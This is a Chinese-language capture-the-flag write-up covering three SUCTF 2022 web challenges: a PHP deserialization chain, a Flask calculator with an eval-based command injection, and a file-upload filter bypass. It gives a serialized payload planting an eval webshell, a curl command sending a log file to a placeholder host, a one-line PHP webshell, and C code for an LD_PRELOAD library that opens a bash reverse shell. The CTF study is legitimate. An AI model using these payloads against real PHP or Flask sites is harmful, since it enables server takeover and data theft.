目录
ezpop
<?php
class crow
{
public $v1;
public $v2;
function eval() {
echo new $this->v1($this->v2);
}
public function __invoke()
{
$this->v1->world();
}
}
class fin
{
public $f1;
public function __destruct()
{
echo $this->f1 . '114514';
}
public function run()
{
($this->f1)();
}
public function __call($a, $b)
{
echo $this->f1->get_flag();
}
}
class what
{
public $a;
public function __toString()
{
$this->a->run();
return 'hello';
}
}
class mix
{
public $m1;
public function run()
{
($this->m1)();
}
public function get_flag()
{
eval('#' . $this->m1);
}
}
if (isset($_POST['cmd'])) {
unserialize($_POST['cmd']);
} else {
highlight_file(__FILE__);
}
反序列化,修改crow中v1的值,利用crow中的eval跳到mix中,利用eval函数来执行命令。
利用链:
fin::__destruct->what::__toString->fin::_run->crow::__invoke->fin::_call->mix::get_flag
Exp:
<?php
class crow
{
public $v1;
public $v2;
public function __construct()
{
$this->v1=new fin();
$this->v1->f1=new mix();
$this->v1->f1->m1="?><?=eval(\$_POST[1]);";
}
}
class fin
{
public $f1;
public function __construct()
{
$f1=$this->f1;
}
}
class what
{
public $a;
public function __construct()
{
$this->a=new fin();
$this->a->f1=new crow();
}
}
class mix
{
public $m1;
public function __construct()
{
$m1=$this->m1;
}
}
$a=new fin();
$a->f1=new what();
echo serialize($a);
payload:(蚁剑的密码)
cmd=O:3:"fin":1:{s:2:"f1";O:4:"what":1:{s:1:"a";O:3:"fin":1:{s:2:"f1";O:4:"crow":2:{s:2:"v1";O:3:"fin":1:{s:2:"f1";O:3:"mix":1:{s:2:"m1";s:21:"?><?=eval($_POST[1]);";}}s:2:"v2";N;}}}}&1
然后cat找flag即可。
Calc:
源码:
#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time
app=Flask(__name__)
def waf(s):
blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
flag = True
for no in blacklist:
if no.lower() in s.lower():
flag= False
print(no)
break
return flag
@app.route("/")
def index():
"欢迎来到SUctf2022"
return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():
ip = request.remote_addr
num = request.values.get("num")
log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
if waf(num):
try:
data = eval(num)
os.system(log)
except:
pass
return str(data)
else:
return "waf!!"
if __name__ == "__main__":
app.run(host='0.0.0.0',port=5000)
提交时会请求/calc路由并提交num参数,源码中当访问calc路由后会进入calc函数,接收num参数,拼接到log里面,再经过waf函数,没有被过滤会先执行eval,然后执行system函数。
Waf中过滤了括号,但没有禁用反引号,所以可以执行system函数。
Payload:
?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23ls
?num=1%23curl%09-X%09GET%09-F%09xx=@tmp/log.txt%09http://ip:6666/%23cat%09Th1s*
Upgdstore:
过滤了一大堆函数,只有少数几个可以用。
base64_decode没有被过滤,可以利用show_source查看源码。
<?php
base64_decode("c2hvd19zb3VyY2U=")("index.php");
得到源码:
<div class="light"><span class="glow">
<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
嘿伙计,传个火?!
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="upload"/>
</form>
</span><span class="flare"></span><div>
<?php
function fun($var): bool{
$blacklist = ["\$_", "eval","copy" ,"assert","usort","include", "require", "$", "^", "~", "-", "%", "*","file","fopen","fwriter","fput","copy","curl","fread","fget","function_exists","dl","putenv","system","exec","shell_exec","passthru","proc_open","proc_close", "proc_get_status","checkdnsrr","getmxrr","getservbyname","getservbyport", "syslog","popen","show_source","highlight_file","`","chmod"];
foreach($blacklist as $blackword){
if(strstr($var, $blackword)) return True;
}
return False;
}
error_reporting(0);
//设置上传目录
define("UPLOAD_PATH", "./uploads");
$msg = "Upload Success!";
if (isset($_POST['submit'])) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_name = $_FILES['upload_file']['name'];
$ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!preg_match("/php/i", strtolower($ext))){
die("只要好看的php");
}
$content = file_get_contents($temp_file);
if(fun($content)){
die("诶,被我发现了吧");
}
$new_file_name = md5($file_name).".".$ext;
$img_path = UPLOAD_PATH . '/' . $new_file_name;
if (move_uploaded_file($temp_file, $img_path)){
$is_upload = true;
} else {
$msg = 'Upload Failed!';
die();
}
echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
}
strstr()函数对大小写敏感,可以利用大小写绕过waf。
利用base64先上传一句话木马。
<?php @eval($_POST['a']);?>
#f82ffc0257783176e9c79a42e32657d0.php
再上传一个php文件使用include来包含刚刚的一句话,利用伪协议对base64进行解码。
cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA==
<?php
Include(base64_decode("cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL2Y4MmZmYzAyNTc3ODMxNzZlOWM3OWE0MmUzMjY1N2QwLnBocA=="));
之后上传上传exp.c和gconv-modules
构造恶意的exp.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload()
{
system("bash -c 'exec bash -i &>/dev/tcp/ip/6666 <&1'");
}
int geteuid()
{
if (getenv("LD_PRELOAD") == NULL)
{
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}
然后编译成so文件。
利用move_uploaded_file进行文件上传
然后访问反弹shell。
a=putenv("LD_PRELOAD=/var/www/html/uploads/exp.so");mail("","","","","");